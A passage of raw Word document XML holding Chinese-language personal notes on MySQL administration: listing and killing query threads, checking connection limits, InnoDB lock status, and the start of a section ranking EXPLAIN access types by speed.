          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="005872BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r w:rsidRPr="005872BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql/bin </w:t>
      </w:r>
      <w:r w:rsidRPr="005872BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下输入</w:t>
      </w:r>
      <w:r w:rsidRPr="005872BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysqladmin processlist;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DF4346" w14:textId="6152C942" w:rsidR="00FE00E4" w:rsidRPr="00FE00E4" w:rsidRDefault="005872BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00B80FD0" w:rsidRPr="00B80FD0">
        <w:t>show processlist;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48866323" w14:textId="77777777" w:rsidR="00033D1B" w:rsidRDefault="00033D1B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442D2094" w14:textId="77777777" w:rsidR="003A2B8C" w:rsidRDefault="003A2B8C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中止掉上面查到的某个线程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1247A091" w14:textId="77777777" w:rsidR="003A2B8C" w:rsidRDefault="003A2B8C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E78323" w14:textId="77777777" w:rsidR="003A2B8C" w:rsidRDefault="003A2B8C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kill id;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9EB2DA" w14:textId="77777777" w:rsidR="003A2B8C" w:rsidRDefault="003A2B8C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F402691" w14:textId="77777777" w:rsidR="003A2B8C" w:rsidRDefault="003A2B8C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysql&gt;kill 277801;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328A7A85" w14:textId="3B146C8E" w:rsidR="003A2B8C" w:rsidRDefault="003A2B8C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ERROR 1317 (70100): Query execution was interrupted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB2D83F" w14:textId="77777777" w:rsidR="00033D1B" w:rsidRDefault="00033D1B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485F0E34" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72EFF580" w14:textId="0BAC2619" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看数据库连接数和状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE10274" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16713104" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F721FDA" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到所有用户的当前连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283CA6EB" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39DC4C1B" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>show full processlist;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53606D44" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354CB227" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看最大连接数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B63F3" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F163CB0" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>show variables like '%max_connection%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13231CDC" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4516CD35" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新设置最大连接数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CB4751" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7BB8D5" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>set global max_connections=1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186E8505" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F1C8C9" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>静态查看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B0BB28" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4708DC33" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>SHOW STATUS LIKE '%Connection%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F4754E" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="724516F0" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实时查看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8DDAB7" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600C7D1D" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>show status like 'Threads%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A28AB2F" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653C0842" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>tail -f oss_components_maven_reverse_monthly.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B15B22E" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A615F43" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>select count(*) from oss_components_maven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24904AEF" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E977223" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>select count(*) from oss_components_golang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23029537" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3523130E" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>select count(*) from oss_components_maven_dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9EE325" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737CBADC" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13198183" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="548A2E2B" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ps -ef | grep syj | grep maven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541A0E92" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06ADE6E9" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ps -ef | grep syj | grep maven | awk '{print $2}' | xargs kill -9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58803363" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49404664" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ps -ef | grep syj | grep mod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D9339C" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="449DB3E0" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询语句：查看被锁的事务的数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710A67CC" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373CEBA1" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>show status like 'innodb_row_lock_%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37285655" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2184C25D" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>show variables like 'inno%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D212832" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C101220" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F946185" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Innodb_row_lock_current_waits : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前等待锁的数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6DE396" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Innodb_row_lock_time : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统启动到现在，锁定的总时间长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C0DB23" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Innodb_row_lock_time_avg : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每次平均锁定的时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A3D244" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Innodb_row_lock_time_max : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最长一次锁定时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C63A9F" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Innodb_row_lock_waits : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统启动到现在总共锁定的次数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C396EB" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75816ED7" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01861429" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC02BA9" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A579FCD" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525B3EAF" w14:textId="1AE6F589" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>SHOW ENGINE InnoDB STATUS;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118099F1" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>innodb_rollback_on_timeout = ON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FF3C17" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CEBA87C" w14:textId="35423390" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看被锁的表是什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12876AAF" w14:textId="67AB64AD" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>show open tables where in_use&gt;0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEEA99D" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="309376A2" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C4C9E63" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E8E0C1C" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE25879" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="370785C0" w14:textId="4590F312" w:rsidR="001F43EC" w:rsidRDefault="001F43EC" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc159779542"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>explain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：性能优化</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="23B8453F" w14:textId="77777777" w:rsidR="001F43EC" w:rsidRDefault="001F43EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9C9F49" w14:textId="06127519" w:rsidR="001F43EC" w:rsidRDefault="009473C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="009473C1">
        <w:t>https://blog.csdn.net/lilongsy/article/details/95184594</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C8B50E" w14:textId="77777777" w:rsidR="001F43EC" w:rsidRDefault="001F43EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B1C038" w14:textId="2E27E9A7" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc159779543"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链接类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="46ADC4BD" w14:textId="77777777" w:rsidR="000F6338" w:rsidRDefault="000F6338" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1866EFB2" w14:textId="44FB5814" w:rsidR="000F6338" w:rsidRPr="006561C3" w:rsidRDefault="000F6338" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006561C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>性能越来越慢的次序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5E5EB7" w14:textId="4EC22151" w:rsidR="000F6338" w:rsidRPr="006561C3" w:rsidRDefault="00C80D90" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006561C3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>system &gt; const &gt; eq_ref &gt; ref &gt; range &gt; index &gt; ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD3036" w14:textId="77777777" w:rsidR="00ED52E1" w:rsidRDefault="00ED52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498E94DE" w14:textId="77777777" w:rsidR="00ED52E1" w:rsidRDefault="00ED52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最快：很少能出现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF1E57B" w14:textId="77777777" w:rsidR="00ED52E1" w:rsidRDefault="00ED52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的等值查询</w:t>
      </w:r>
    </w:p>
